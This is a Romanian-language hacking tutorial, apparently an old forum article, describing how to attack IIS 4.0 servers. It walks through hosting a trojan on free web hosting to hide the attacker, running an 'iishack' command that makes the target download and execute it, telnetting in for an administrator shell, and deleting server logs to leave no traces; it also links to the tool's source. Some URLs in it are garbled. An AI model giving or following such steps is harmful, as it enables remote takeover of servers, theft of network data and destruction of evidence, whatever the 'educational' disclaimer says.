IIS 4.0 Web Atack

[Gonzalez]

Aceasta este prima parte dintr-o serie de articole despre BUG-urile Windows-ului NT , si are scop PUR EDUCATIONAL , prin aceasta nu-mi asum responsabilitatea utilizarii cu alte scopuri decit cele educationale.Cam atit cu partea introductiva , de trebuie si ea pusa pe aici.

Sa trecem la lucruri serioase; de ce se cheama WEB Atack ? , simplu , pentru ca atacul este indrepta asupra serverului de internet al Windows-ului NT , si mai precis , se da direct pe Portul 80 , ceea ce face ineficienta o protectie cu FireWall .

Sa vedem acum ce face ? Pai nimic grav , Doar oricine poate obtine prompt DOS in server cu drepturi de ADMINISTRATOR , adica poti face ce vrei cu bietul server , de la sterfisiere , schimbat parole , pina copiat informatii din intreaga retea , nu numai de pe server , asadar o nimica toata. Pentru a explica cum functioneaza , este necesara explicarea , sau mai precis , prezentarea citorva din facilitatiile IIS 4.0 :

HTR - HTML Remote Administration Permite administrare de la distanta .

IDC - Internet DATABASE Connector Permite unei aplicatii de internet sa acceseze HDD , in mod direct prntru cautare de date .

STM - Server Files

Cind se face o cere catre un server ( adresa de internet ) - http://www.tinta.com - , serverul de internet , IIS 4.0 , raspunde prin trimiterea cererii catre niste programele ( htr.dll , idc.dll , stm.dll ) , care analizeaza cererea , si hoatarasc ce sa faca . In acest lant , a aparut o scapare , si se poate ca in anumite situatii , in urma unei cereri , sa se faca un DOWNLOAD urmat de o EXECUTIE pe server a unui TROJAN .

Problema cu toate ca este foarte periculoasa , in loc sa fie analizata serios , a facut , ca acest lucru - Download-ul si EXECUTAREA pe SERVER / WORKSTATION ( prin workstation ma refer la ori ce calculator care are un sistem de operare pe el ) a programelor sa ia amploare prin utilizarea tehnologiei JAVA , care este baza pe acest lucru . Acesta va fi un alt subiect de articol intru-un nr. viitor.

Sa reluam discutia ; zice-am ca IIS 4.0 va rula programul pe care i l-am indicat , in cazul nostru un trojan , in urma exectarii acestuia , se va trimite pe portul 80 sau 99 prompt DOS cu drept de ADMINISTRATOR.

Cum se ataca un server , folosind acest BUG ?

Mai intii se pune la o adresa de internet trojanul - se zicem ca exemplu la geocities sau tripod sau in oricare alta parte unde se asigura free web hosting ( asta ca sa nu se prinda de unde s-a dat atacul ) , pentru cazul nostru asdresa unde se afla trojanul este : sau

http://www.freeservers.com/MySite/ncx99.exe'>http://www.freeservers.com/MySite/ncx.exe

sau

http://www.freeservers.com/MySite/ncx99.exe , unde atit ncx.exe ( pentru portul 80 ) , cit si ncx99.exe ( pentru portul 99 ) sunt trojenii care vor fi download-ati si executati de serverul tinta .Programele trebuie sa se afla - in cazul exemplului - in root-ul site-ului , adica unde se afla pagina Defaul.htm sau index.html , mai precis unde se afla intreg site-ul.

Acum este foarte simplu ce aveti de facut , doar butonati urmatarea linie de comanda :

iishack http://www.tinta.com 80

Parametrii'>http://www.freeservers.com/MySite/ncx.exe

Parametrii de lasare a programului IISHACK :

SINTAXA: iishack <host> <port> <url>

ex - iishack http://www.tinta.com 80 Dupa'>http://www.myserver.com/thetrojan.exe

Dupa trimiterea atacului , IIS 4.0 de pe tinta , nu va mai raspunde la comenzii , iar trojan-ul se va download-a si se va executa , apoi , daca totul a fost OK , se poate face telnet pe http://www.tinta.com pe portul 80 sau 99 ( functie de trojan-ul folosit ) si va aparea un prompt de DOS . Trebuie avut grija , ca sunt necesare cateva secunde pina se face download-ul , iar telnet-ul trebuie dat in max 30 sec. , dupa aceea trebuie restartat serverul tinta .

Dupa intrare trebuie sterse logurile : c:winntsystem32logs , si sterge-ti tot ce se poate , pentru a nu lasa urme.

ATENTIE !!!! Nu poate fi rulat decat o singura data , IIS , blocandu-se , aceasta necesitand o reinitializare a sistemului .

Codul Sursa:

http://rapidshare.ro/download.php?id=2Je10cKWW7H9Mk8i1pyP

Credit: ZOMBY